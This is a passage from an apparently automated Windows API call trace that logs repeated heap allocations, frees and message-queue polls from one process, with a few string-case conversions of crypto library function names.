lpMsg=0x6aed6c) returned 0 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0038.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0038.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0038.224] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.224] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0038.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1ccc) returned 0xac0018 [0038.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0038.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0038.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0038.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889958 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1ccc) returned 0xac39c8 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0038.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.225] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0038.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0038.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0038.226] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0038.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0038.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0038.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0038.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0038.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0038.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0038.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0038.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0038.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0038.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.226] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0038.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0038.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0038.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3f8 [0038.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0038.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0038.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0038.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0038.226] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c880 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0038.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.227] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.227] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0038.227] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.227] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0038.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0038.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0038.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0038.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0038.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0038.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0038.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.228] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0038.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0038.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0038.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.228] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.228] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0038.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0038.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0038.229] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0038.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0038.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0038.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0038.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0038.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0038.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.229] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.229] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0038.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0038.229] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.230] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0038.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0038.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0038.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.230] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0038.230] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0038.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.231] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0038.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0038.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0038.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.231] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0038.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.232] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0038.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0038.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0038.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0038.232] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0038.232] HeapFree (in: hHeap=0x770000, 